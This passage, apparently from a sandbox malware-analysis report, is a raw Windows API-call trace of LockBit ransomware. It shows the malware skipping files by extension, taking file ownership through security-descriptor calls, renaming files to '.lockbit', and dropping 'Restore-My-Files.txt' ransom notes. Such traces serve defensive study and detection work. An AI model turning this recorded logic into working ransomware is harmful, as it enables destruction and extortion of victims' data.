Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0080.967] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0080.967] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.967] malloc (_Size=0x40068) returned 0x20abae0 [0080.967] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0080.969] GetLastError () returned 0x3e5 [0080.969] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0080.969] lstrcmpiW (lpString1=".", lpString2="baseAltGr_rtl.xml") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="baseAltGr_rtl.xml") returned -1 [0080.969] PathFindExtensionW (pszPath="baseAltGr_rtl.xml") returned=".xml" [0080.969] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.969] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.970] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.971] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.971] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="baseAltGr_rtl.xml") returned 1 [0080.971] lstrcmpiW (lpString1="ntldr", lpString2="baseAltGr_rtl.xml") returned 1 [0080.971] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="baseAltGr_rtl.xml") returned 1 [0080.971] lstrcmpiW (lpString1="bootsect.bak", lpString2="baseAltGr_rtl.xml") returned 1 [0080.971] lstrcmpiW (lpString1="autorun.inf", lpString2="baseAltGr_rtl.xml") returned -1 [0080.971] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0080.971] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned=".xml" [0080.971] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.971] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.971] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.972] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.973] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.973] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.973] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.973] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.lockbit") returned 96 [0080.973] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.973] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.lockbit")) returned 0 [0080.973] GetLastError () returned 0x5 [0080.973] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.974] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.974] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.974] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.974] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.974] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b8, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.975] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.975] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0080.989] NtClose (Handle=0x3b8) returned 0x0 [0080.989] RtlFreeAnsiString (AnsiString="\\") [0080.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b8) returned 1 [0080.989] malloc (_Size=0x200) returned 0x53fcc0 [0080.989] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0080.989] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.989] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.989] CloseHandle (hObject=0x3b8) returned 1 [0080.989] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0080.990] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0080.990] free (_Block=0x53fcc0) [0080.990] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.990] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.lockbit")) returned 1 [0080.991] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0080.991] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.991] malloc (_Size=0x40068) returned 0x20abae0 [0080.991] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=247) returned 1 [0080.992] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 0x0 [0080.993] GetLastError () returned 0x3e5 [0080.993] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0080.993] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0080.993] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.993] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0080.993] lstrcmpiW (lpString1=".", lpString2="base_altgr.xml") returned -1 [0080.993] lstrcmpiW (lpString1="..", lpString2="base_altgr.xml") returned -1 [0080.993] PathFindExtensionW (pszPath="base_altgr.xml") returned=".xml" [0080.993] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.993] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.994] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.995] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.995] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.995] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.996] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.996] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.996] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base_altgr.xml") returned 1 [0080.996] lstrcmpiW (lpString1="ntldr", lpString2="base_altgr.xml") returned 1 [0080.996] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base_altgr.xml") returned 1 [0080.996] lstrcmpiW (lpString1="bootsect.bak", lpString2="base_altgr.xml") returned 1 [0080.997] lstrcmpiW (lpString1="autorun.inf", lpString2="base_altgr.xml") returned -1 [0080.997] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0080.997] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned=".xml" [0080.997] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.997] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.997] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.998] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.998] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.998] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit") returned 93 [0080.998] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit")) returned 0 [0081.003] GetLastError () returned 0x5 [0081.003] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.003] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.003] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.004] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.004] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.004] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.004] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.005] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.017] NtClose (Handle=0x3b0) returned 0x0 [0081.017] RtlFreeAnsiString (AnsiString="\\") [0081.017] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0081.017] malloc (_Size=0x200) returned 0x53fcc0 [0081.017] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.017] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.018] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.018] CloseHandle (hObject=0x3b0) returned 1 [0081.018] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.018] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.019] free (_Block=0x53fcc0) [0081.019] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.019] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit")) returned 1 [0081.020] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0081.020] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.020] malloc (_Size=0x40068) returned 0x206b860 [0081.020] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3161) returned 1 [0081.020] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.028] GetLastError () returned 0x3e5 [0081.028] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.028] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.028] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 